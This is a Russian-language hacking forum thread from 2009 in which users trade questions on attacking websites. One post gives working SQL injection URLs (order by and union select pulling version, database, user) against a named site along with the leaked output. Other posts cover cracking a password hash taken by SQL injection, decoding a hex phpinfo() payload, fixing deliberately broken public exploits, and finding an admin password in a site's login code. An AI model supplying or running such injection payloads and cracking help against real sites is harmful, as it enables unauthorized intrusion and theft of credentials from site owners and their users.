Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    откудого ты подобрал эти символы ??
    %20 это видимо пробле. а остальное ?


    спасибо )
     
  2. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    0x706870696e666f28293b=phpinfo();
     
  3. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    Code:
    http://site.ru//tv/?prn&ch=1&rubrics[]=1)+order+by+1--+
    http://site.ru/tv/?prn&ch=1&rubrics[]=-1)+union+select+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11--+
    5.0.22-log:xmlvlru:[email protected]:redhat-linux-gnu
     
    #6623 farex, 14 Apr 2009
    Last edited: 15 Apr 2009
    1 person likes this.
  4. neverdie

    neverdie New Member

    Joined:
    20 Mar 2009
    Messages:
    4
    Likes Received:
    3
    Reputations:
    0
    народ вот есть много эксплойтов под разны уязвимости... в общем в чем вопрос: я когда сохраняю сплойт например на перл абсолютно не изменяя его ввожу в cmd cd C:\perl\bin
    perl sploit.pl
    нажимаю enter вроде должен запуститься но пишет ошибку синтаксиса, хз почему, в чем может быть проблема , и так со всеми сплойтами абсолютно, переустановка компилятора не помогла
     
    1 person likes this.
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    neverdie
    Это происходит потому, что в сплоитах с паблика очень часто НАМЕРЕННО сделаны ошибки, обычно мелкие синтаксические, для того, что-бы откровенные нубы не могли им воспользоваться.

    Т.е: ищи ошибку , исправляй и юзай :)

    PS Только не нужно сюда копипастить сплоит с просьбой найти ошибку, их не для этого там делают
     
    1 person likes this.
  6. neverdie

    neverdie New Member

    Joined:
    20 Mar 2009
    Messages:
    4
    Likes Received:
    3
    Reputations:
    0
    хм, ну php я более менее шарю а вот перл хз, ну ошибки это подло )))) а как их находить-то если не оч разбираешься в синтаксисе это ж не html редактировать)
     
  7. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Тогда тебе не повезло, учи перл...
     
  8. FarIZ

    FarIZ New Member

    Joined:
    16 Mar 2009
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    короче не обессудьте,
    вопрос
    в форум о хешах не пишу, потому как молчат там все

    насколько я знаю, у mysql5 длина 40 байтов . а какая длина у mysql ?
    спрашиваю потому что хеши которые я выдрал из 4 версии имеют длину 40


    и второй вопрос .

    есть сайт . сканирую nmap-ом, диапазон портов не задаю, т.е. должно использоваться сканир. стандартн. портов .
    но сканер выдает бесконечный ряд всевозможных открытых портов, среди них есть и
    2, 3, 4 , 5 - значные, короче любые . и главное , скан не заканчивается .

    как мне нормально отсканировать сайт ? может в опциях указать что-нибудь
     
  9. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    Здравствуйте , приятного времени суток

    Достал пароль от accaunt'a (Sql-inje.. ) а он с salt.
    Подскажите , где можно найти сам код salt'a , на сайте,в каких таблицах или kak он выглядит...
    слышал что такое возможно )
     
  10. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    16
    Можно поточнее,от форума или откуда-нибудь ещё? И как определил что он с солью?
     
  11. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    Скажите плз это реально расшифровать?
    и чем это вообще зашифровано?
     
  12. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    пароль от сайта
    пробовал через этот сайт:
    https://hashcracking.info/index.php

    никаких результатов , поэтому и подумал что он с salt. 04b1abea6597fe097c29ca3aebd16584

    Но проста , даже на будущее, kak узнать что это salt, где он может быть ,если это сайт или Форум.
     
  13. fker

    fker Member

    Joined:
    26 Nov 2008
    Messages:
    135
    Likes Received:
    64
    Reputations:
    -1
    Реально. MD5(Wordpress)
    http://insidepro.com/hashes.php (здесь более 100 видов хешей)
     
  14. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    mysql5 просто называется mysql5 поддерживается с mysql 4.1 и вобщето он 20 байт а mysql хеш 8 байт
     
  15. FarIZ

    FarIZ New Member

    Joined:
    16 Mar 2009
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    ответьте кто-нибудь пожал.
    или же дайте ссылку на тему где ответят (железно только)
     
  16. fker

    fker Member

    Joined:
    26 Nov 2008
    Messages:
    135
    Likes Received:
    64
    Reputations:
    -1
    Опции, с которыми ты запускаешь nmap можешь показать? Здесь можно почитать про nmap, про типы сканировани и про возможные ситуации.
     
  17. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    У меня такой вопрос где может прятатся пароль от админик сайта, парол который есть в базе даных не подходит! админка писалась вручную есть исходник login.php

    <?

    include './../cfg.php';
    include './../lib/macros.class.php';
    include './../lib/mail.class.php';

    $sql = "SELECT * FROM ".PREF."admin";
    ($result = mysql_query($sql)) or die ($sql . ' : ' . mysql_error());
    $f = mysql_fetch_array($result);

    $login = $f['login'];
    $pwd = $f['pwd'];
    $email = $f['mail'];
    $message = '';

    if(isset($_GET['action']) && $_GET['action'] == 'lost_pwd'){

    $mail = new mime_mail;
    $mail -> from = $_SERVER['HTTP_HOST'];
    $mail -> to = $email;
    $mail -> subject = "Забыли пароль";
    $mail -> body = "Логин :$login\n".
    "Пароль:$pwd\n";
    // $mail -> print_message("text/plain");
    $mail -> send("text/plain");
    $message = "<b>Пароль и логин отправлены на Ваш EMail.</b>";
    }

    function set_values($login="", $password="", $url="") {

    session_start();

    global $HTTP_SESSION_VARS;

    $HTTP_SESSION_VARS['login_admin'] = $login;
    $HTTP_SESSION_VARS['password_admin'] = $password;

    if ($url) {
    header("Location: $url");
    exit;
    }
    }

    if (isset($_POST['login_admin']) && isset($_POST['password_admin'])) {

    if ($_POST['login_admin']==$login && $_POST['password_admin']==$pwd) {
    set_values($_POST['login_admin'], $_POST['password_admin'], "index.php");
    }
    else {

    set_values();
    $a = new Macros;
    $a -> assign(array(
    'MESSAGE' => $message
    ));
    $a->define("templates/login.htm");
    $a->parse(0);
    print $a->fetch();
    exit;
    }

    }

    session_start();

    if (isset($HTTP_SESSION_VARS['login_admin']) && isset($HTTP_SESSION_VARS['password_admin'])) {

    if ($HTTP_SESSION_VARS['login_admin'] != $login && $HTTP_SESSION_VARS['password_admin']!=$pwd){

    set_values();
    $a = new Macros;
    $a -> assign(array(
    'MESSAGE' => $message
    ));
    $a->define("templates/login.htm");
    $a->parse(0);
    print $a->fetch();
    exit;
    }

    }

    else {

    set_values();
    $a = new Macros;
    $a -> assign(array(
    'MESSAGE' => $message
    ));
    $a->define("templates/login.htm");
    $a->parse(0);
    print $a->fetch();
    exit;
    }
    ?>
     
    #6637 massovka, 15 Apr 2009
    Last edited: 15 Apr 2009
  18. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    include './../cfg.php';
    перейди на папку выше, там будет cfg.php, в нем возможно
    upd. ой ступил, ему не это надо=(
     
    #6638 laedafess, 15 Apr 2009
    Last edited: 15 Apr 2009
    2 people like this.
  19. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    Code:
    $sql = "SELECT * FROM ".PREF."admin";
    ($result = mysql_query($sql)) or die ($sql . ' : ' . mysql_error());
    $f = mysql_fetch_array($result);
    $login = $f['login'];
    $pwd = $f['pwd'];
    вот тут :) (может ты не из той таблицы тянешь пасс ы?)
    префикс таблицы скорее всего тут include './../cfg.php';
     
    1 person likes this.
  20. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Там будет конфиг подключения к базе лежать...
    Что разве не видишь запрос?

    Code:
    $sql = "SELECT * FROM ".PREF."admin"; 
    
    Тут пароль полюбому..и больше никак..
     
    1 person likes this.
Thread Status:
Not open for further replies.